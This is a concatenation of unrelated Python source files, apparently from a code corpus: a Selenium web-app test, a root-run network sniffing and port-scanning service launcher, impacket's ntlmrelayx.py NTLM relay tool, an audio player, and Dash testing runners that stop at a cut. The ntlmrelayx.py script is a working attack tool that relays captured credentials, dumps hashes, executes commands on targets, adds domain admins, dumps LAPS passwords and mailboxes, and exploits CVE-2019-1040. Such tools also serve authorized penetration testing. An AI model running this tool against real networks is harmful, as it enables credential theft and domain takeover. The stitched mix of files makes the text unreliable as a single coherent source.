# Question page, choose yes, we have a guess result for it
qyes = driver.find_element_by_css_selector('input[value="yes"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qyes, 'Question answer yes radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qyes.click()
qsubmit.click()
# Guess page, choose _no_, our guess is wrong
gno = driver.find_element_by_css_selector('input[value="no"]')
gsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
gno, 'Guess correctness no radio button should exist.')
self.assertIsNotNone(gsubmit, 'Guess submit button should exist.')
gno.click()
gsubmit.click()
# Since we don't know about the language, we go to add new language
# page.
self.assertEqual(driver.current_url,
self.index_page_url + 'new_language',
'We should be at new language page now.')
# And since we're here, we'll add the new language.
llang = driver.find_element_by_css_selector('input[name="language"')
lq = driver.find_element_by_css_selector('input[name="question"]')
lano = driver.find_element_by_css_selector(
'input[name="answer"][value="no"]')
lsubmit = driver.find_element_by_css_selector('input[type="submit"]')
llang.send_keys('Ruby')
lq.send_keys('Does it enforce indentation?')
lano.click()
lsubmit.click()
# Now we should be at index page now
self.assertEqual(driver.current_url, self.index_page_url,
'We should be at index page by now.')
# At last, we will verify the new language is entered into the database
t = LanguageTest.query.order_by(-LanguageTest.id).first()
nl = LanguageTest('Does it enforce indentation?', False, 'Ruby')
self.assertEqual(t, nl, '%r should be in database now' % nl)
def test_can_not_go_to_question_page_initially(self):
driver = self.driver
driver.get(self.index_page_url + 'question')
self.assertEqual(driver.current_url, self.index_page_url,
'We can\'t go to question page not from index page.')
def test_can_not_go_to_guess_page_initially(self):
driver = self.driver
driver.get(self.index_page_url + 'guess')
self.assertEqual(driver.current_url, self.index_page_url,
'We can\'t go to guess page not from index page.')
def test_can_not_go_to_add_new_language_page_initially(self):
driver = self.driver
driver.get(self.index_page_url + 'new_language')
self.assertEqual(driver.current_url, self.index_page_url,
'We can\'t go to add new language page not from index page.')
|
service.py
|
import sys
import threading
import os
import signal
import argparse
import random
import time
import logging
logger = logging.getLogger(__name__)
# Hide requests from the logs
import requests
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.ERROR)
from clint.textui import colored
from clint.textui.colored import ColoredString
from multiprocessing import Process, Value
from dissemination.util import get_host_ip
def signal_handler(siganl, frames):
"""
Signal handler that kills all the processes created by the application.
"""
logger.warn("Killing the running services.")
for process in processes:
logger.warn("Killing process {}".format(process.pid))
os.system("kill -9 {}".format(process.pid))
sys.exit(0)
def services(benchmark, device_name=None, filter_mask=None, batch_threads=1, no_scans=False):
"""
Starts all the bussiness-logic microservices.
:param benchmark: When benchmark parameter is True, we disable the database
and inference services for the purpose of benchmarking.
:param device_name: Device name passed to sniffing_service
:param filter_mask: Filter mask passed to sniffing_service.
:param batch_threads: Batch size passes to graph_service(and the populator).
:param no_scans: When no scans is True, the populator is disabled.
:return: returns nothing
"""
from topology.graph.graph_service import graph_service
from topology.sniffer.sniffing_service import sniffing_service
from database.database_service import database_service
from inference.inference_service import inference_service
global processes
if benchmark is not None:
processes.append(Process(target=database_service))
processes.append(Process(target=inference_service, kwargs ={'env' : os.environ.copy()}))
processes.append(Process(target=graph_service, args=(str(batch_threads), str(no_scans))))
processes.append(Process(target=sniffing_service, args=(device_name, filter_mask)))
def bind_simulation(simulation):
"""
Overrides the default services with a simulation.
The seam points are devices.open_connection and discovery.discovery_ip.
"""
import topology.sniffer.devices as devices
import topology.discovery.discovery as discovery
devices.open_connection = lambda device_name: [simulation.connection()]
discovery.discovery_ip = lambda ip: simulation.discovery_ip(ip)
def set_ports(node_type):
"""
Provides dynamic port binding for slave services and fixed port binding
for master services.
"""
import service.server as config_keeper
port_offset = 30000
if node_type == "slave":
config = {
'inference' : port_offset + random.randint(0, port_offset),
'database' : port_offset + random.randint(0, port_offset),
'sniffer' : port_offset + random.randint(0, port_offset),
'graph' : port_offset + random.randint(0, port_offset)
}
elif node_type == "master":
config = config_keeper.config
else:
logger.error("Wrong type specified.")
os.kill(os.getpid(), signal.SIGINT)
setattr(config_keeper, 'config', config)
def setup_loggers(verbose):
"""
Sets up loggers by the given level of verbosity. We also provide file
logging in the file 'attack-graph.log' (with DEBUG verbosity level).
:param verbose: when the flag for verbosity is set, the logging level is set
to DEBUG.
:return: returns nothing
"""
stderr_handler = logging.StreamHandler(sys.stderr)
class ColoredFormatter(logging.Formatter):
"""
Formatter that allows coloring logs via Clint library.
"""
def format(self, record):
msg = record.getMessage()
out_msg = '{}:{}:{}'.format(
str(record.levelname),
record.name,
str(msg)
)
if hasattr(record.msg, 'color'):
color = record.msg.color
colored_msg = str(ColoredString(color, str(out_msg)))
return colored_msg
return out_msg
if args.verbose:
stderr_handler.setLevel(logging.DEBUG)
else:
stderr_handler.setLevel(logging.INFO)
stderr_handler.setFormatter(ColoredFormatter())
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Logging to file as well
file_handler = logging.FileHandler('attack-graph.log')
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logging.basicConfig(
level=logging.DEBUG,
handlers=[stderr_handler, file_handler]
)
def setup_dissemination(args):
"""
Dissemination module setup.
:param args: the arguments received by the function are the arguments
received by the main application under the form of a dictionary.
:return: returns nothing
"""
if args.type == "master":
from dissemination.master import master_service
from dissemination.slave import slave_service
port_offset = 30000
port = port_offset + random.randint(0, port_offset)
# When running a master we need a slave as well as only the slave keeps the graph
processes.append(Process(target=master_service))
processes.append(Process(target=slave_service, args=(get_host_ip(), port)))
if args.type == "slave":
master_ip = args.master
port = args.port
if master_ip is None or port is None:
logger.error("Not enough arguments provided for slave mode.")
os.kill(os.getpid(), signal.SIGINT)
from dissemination.slave import slave_service
processes.append(Process(target=slave_service, args=(master_ip, port)))
def setup_argparser():
"""
Argument parser setup using argparse library.
:return: returns an ArgumentParser
"""
parser = argparse.ArgumentParser()
parser.add_argument("type", type=str,
help="The type of node run: 'master' or 'slave'")
parser.add_argument("-m", "--master", type=str, default=None,
help="Specify master IP for connecting a slave.")
parser.add_argument("-p", "--port", type=str, default=None,
help="Specify port for runnning a slave.")
parser.add_argument("-i", "--interface", type=str, default=None,
help="The network interface listened to.")
parser.add_argument("-s", "--simulation", type=str, default=None,
help="To run a simulated network from a network configuration file use this flag.")
parser.add_argument("-f", "--filter", type=str, default=None,
help="Specify a mask for filtering the packets. (e.g. '10.1.1.1/16' would keep packets starting with '10.1')")
parser.add_argument("-v", '--verbose', dest='verbose', action='store_true',
help="Set the logging level to DEBUG.")
parser.add_argument("-b" , "--benchmark", dest='benchmark', action='store_true',
help="Disables database and inference engine for benchmarking.")
parser.add_argument("-t", "--batch_threads", type=int, default=1,
help="Number of threads that should run host discovery.")
parser.add_argument("-n", "--no-scan", dest='no_scan', action='store_true',
help="Disable port scanning.")
parser.set_defaults(verbose=False)
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
setup_loggers(args.verbose)
if os.getuid() != 0:
logger.error("Must be run as root.")
exit(1)
if args.simulation is not None:
from simulation.simulation import Simulation
args.interface = "virtual_interface"
bind_simulation(Simulation(args.simulation))
global processes
processes = []
set_ports(args.type)
services(args.benchmark, args.interface, args.filter, args.batch_threads)
setup_dissemination(args)
signal.signal(signal.SIGINT, signal_handler)
for process in processes:
process.start()
for process in processes:
process.join()
|
ntlmrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Generic NTLM Relay Module
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_finished_attacks(self, line):
for url in self.relayConfig.target.finishedAttacks:
print (url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, "
"can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port "
"are optional, and don't forget to escape the '\\'). If unspecified, it will relay back "
"to the client')")
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient or LDAP console instead'
'of executing a command after a successful relay. This console will listen locally on a '
' tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_mutually_exclusive_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
'SMB Server (16 hex bytes long. eg: 1122334455667788)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file. (default=1)')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
' in the same directory). For RPC no output will be provided.')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#RPC arguments
rpcoptions = parser.add_argument_group("RPC client options")
rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
help='Use this credential to authenticate to SMB (low-privilege account)')
rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.rpc_use_smb and not options.auth_smb:
logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
player.py
|
"""
"""
import threading
import types
import wave
import pyaudio
CHUNK_SIZE = 1024
class Player:
def __init__(self, pyaudio_instance=None):
self.pyaudio_instance = pyaudio_instance if pyaudio_instance else pyaudio.PyAudio()
self.stop_event = threading.Event()
self.device_index = None
for i in range(self.pyaudio_instance.get_device_count()):
dev = self.pyaudio_instance.get_device_info_by_index(i)
name = dev['name'].encode('utf-8')
print('{}:{} with {} input channels'.format(i, name, dev['maxOutputChannels']))
if name.find('ReSpeaker 4 Mic Array') >= 0 and dev['maxOutputChannels'] >= 1:
self.device_index = i
break
if self.device_index is None:
raise ValueError('Can not find {}'.format('ReSpeaker 4 Mic Array'))
def _play(self, data, rate=16000, channels=1, width=2):
stream = self.pyaudio_instance.open(
format=self.pyaudio_instance.get_format_from_width(width),
channels=channels,
rate=rate,
output=True,
output_device_index=self.device_index,
frames_per_buffer=CHUNK_SIZE,
)
if isinstance(data, types.GeneratorType):
for d in data:
if self.stop_event.is_set():
break
stream.write(d)
else:
stream.write(data)
stream.close()
def play(self, wav=None, data=None, rate=16000, channels=1, width=2, block=True):
"""
play wav file or raw audio (string or generator)
Args:
wav: wav file path
data: raw audio data, str or iterator
rate: sample rate, only for raw audio
channels: channel number, only for raw data
width: raw audio data width, 16 bit is 2, only for raw data
block: if true, block until audio is played.
spectrum: if true, use a spectrum analyzer thread to analyze data
"""
if wav:
f = wave.open(wav, 'rb')
rate = f.getframerate()
channels = f.getnchannels()
width = f.getsampwidth()
def gen(w):
d = w.readframes(CHUNK_SIZE)
while d:
yield d
d = w.readframes(CHUNK_SIZE)
w.close()
data = gen(f)
self.stop_event.clear()
if block:
self._play(data, rate, channels, width)
else:
thread = threading.Thread(target=self._play, args=(data, rate, channels, width))
thread.start()
def stop(self):
self.stop_event.set()
def close(self):
pass
def main():
import sys
if len(sys.argv) < 2:
print('Usage: python {} music.wav'.format(sys.argv[0]))
sys.exit(1)
player = Player()
player.play(sys.argv[1])
if __name__ == '__main__':
main()
|
application_runners.py
|
import sys
import os
import uuid
import shlex
import threading
import shutil
import subprocess
import logging
import inspect
import runpy
import flask
import requests
from dash.testing.errors import NoAppFoundError, TestingTimeoutError, ServerCloseError
from dash.testing import wait
logger = logging.getLogger(__name__)
def import_app(app_file, application_name="app"):
"""Import a dash application from a module. The import path is in dot
notation to the module. The variable named app will be returned.
:Example:
>>> app = import_app("my_app.app")
Will import the application in module `app` of the package `my_app`.
:param app_file: Path to the app (dot-separated).
:type app_file: str
:param application_name: The name of the dash application instance.
:raise: dash_tests.errors.NoAppFoundError
:return: App from module.
:rtype: dash.Dash
"""
try:
app_module = runpy.run_module(app_file)
app = app_module[application_name]
except KeyError as app_name_missing:
logger.exception("the app name cannot be found")
raise NoAppFoundError(
"No dash `app` instance was found in {}".format(app_file)
) from app_name_missing
return app
class BaseDashRunner:
"""Base context manager class for running applications."""
def __init__(self, keep_open, stop_timeout):
self.port = 8050
self.started = None
self.keep_open = keep_open
self.stop_timeout = stop_timeout
self._tmp_app_path = None
def start(self, *args, **kwargs):
raise NotImplementedError # pragma: no cover
def stop(self):
raise NotImplementedError # pragma: no cover
@staticmethod
def accessible(url):
try:
requests.get(url)
except requests.exceptions.RequestException:
return False
return True
def __call__(self, *args, **kwargs):
return self.start(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, traceback):
if self.started and not self.keep_open:
try:
logger.info("killing the app runner")
self.stop()
except TestingTimeoutError as cannot_stop_server:
raise ServerCloseError(
"Cannot stop server within {}s timeout".format(self.stop_timeout)
) from cannot_stop_server
logger.info("__exit__ complete")
@property
def url(self):
"""The default server url."""
return "http://localhost:{}".format(self.port)
@property
def is_windows(self):
return sys.platform == "win32"
@property
def tmp_app_path(self):
return self._tmp_app_path
class ThreadedRunner(BaseDashRunner):
"""Runs a dash application in a thread.
This is the default flavor to use in dash integration tests.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
self.thread = None
@staticmethod
def _stop_server():
# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#shutting-down-the-server
stopper = flask.request.environ.get("werkzeug.server.shutdown")
if stopper is None:
raise RuntimeError("Not running with the Werkzeug Server")
stopper()
return "Flask server is shutting down"
# pylint: disable=arguments-differ
def start(self, app, **kwargs):
"""Start the app server in threading flavor."""
app.server.add_url_rule(self.stop_route, self.stop_route, self._stop_server)
def _handle_error():
self._stop_server()
app.server.errorhandler(500)(_handle_error)
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
if "port" not in kwargs:
kwargs["port"] = self.port
else:
self.port = kwargs["port"]
app.run_server(threaded=True, **kwargs)
self.thread = threading.Thread(target=run)
self.thread.daemon = True
try:
self.thread.start()
except RuntimeError: # multiple call on same thread
logger.exception("threaded server failed to start")
self.started = False
self.started = self.thread.is_alive()
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=1)
def stop(self):
requests.get("{}{}".format(self.url, self.stop_route))
wait.until_not(self.thread.is_alive, self.stop_timeout)
class ProcessRunner(BaseDashRunner):
"""Runs a dash application in a waitress-serve subprocess.
This flavor is closer to production environment but slower.
"""
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.proc = None
# pylint: disable=arguments-differ
def start(
self,
app_module=None,
application_name="app",
raw_command=None,
port=8050,
start_timeout=3,
):
"""Start the server with waitress-serve in process flavor."""
if not (app_module or raw_command): # need to set a least one
logging.error(
"the process runner needs to start with at least one valid command"
)
return
self.port = port
args = shlex.split(
raw_command
if raw_command
else "waitress-serve --listen=0.0.0.0:{} {}:{}.server".format(
port, app_module, application_name
),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen( # pylint: disable=consider-using-with
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=start_timeout)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
self.stop()
return
self.started = True
def stop(self):
if self.proc:
try:
logger.info("proc.terminate with pid %s", self.proc.pid)
self.proc.terminate()
if self.tmp_app_path and os.path.exists(self.tmp_app_path):
logger.debug("removing temporary app path %s", self.tmp_app_path)
shutil.rmtree(self.tmp_app_path)
_except = subprocess.TimeoutExpired # pylint:disable=no-member
self.proc.communicate(
timeout=self.stop_timeout # pylint: disable=unexpected-keyword-arg
)
except _except:
logger.exception(
"subprocess terminate not success, trying to kill "
"the subprocess in a safe manner"
)
self.proc.kill()
self.proc.communicate()
logger.info("process stop completes!")
class RRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app, start_timeout=2, cwd=None):
"""Start the server with subprocess and Rscript."""
if os.path.isfile(app) and os.path.exists(app):
# app is already a file in a dir - use that as cwd
if not cwd:
cwd = os.path.dirname(app)
logger.info("RRunner inferred cwd from app path: %s", cwd)
else:
# app is a string chunk, we make a temporary folder to store app.R
# and its relevant assets
self._tmp_app_path = os.path.join(
"/tmp" if not self.is_windows else os.getenv("TEMP"), uuid.uuid4().hex
)
try:
os.mkdir(self.tmp_app_path)
except OSError:
logger.exception("cannot make temporary folder %s", self.tmp_app_path)
path = os.path.join(self.tmp_app_path, "app.R")
logger.info("RRunner start => app is R code chunk")
logger.info("make a temporary R file for execution => %s", path)
logger.debug("content of the dashR app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
# try to find the path to the calling script to use as cwd
if not cwd:
for entry in inspect.stack():
if "/dash/testing/" not in entry[1].replace("\\", "/"):
cwd = os.path.dirname(os.path.realpath(entry[1]))
logger.warning("get cwd from inspect => %s", cwd)
break
if cwd:
logger.info("RRunner inferred cwd from the Python call stack: %s", cwd)
# try copying all valid sub folders (i.e. assets) in cwd to tmp
# note that the R assets folder name can be any valid folder name
assets = [
os.path.join(cwd, _)
for _ in os.listdir(cwd)
if not _.startswith("__") and os.path.isdir(os.path.join(cwd, _))
]
for asset in assets:
target = os.path.join(self.tmp_app_path, os.path.basename(asset))
if os.path.exists(target):
logger.debug("delete existing target %s", target)
shutil.rmtree(target)
logger.debug("copying %s => %s", asset, self.tmp_app_path)
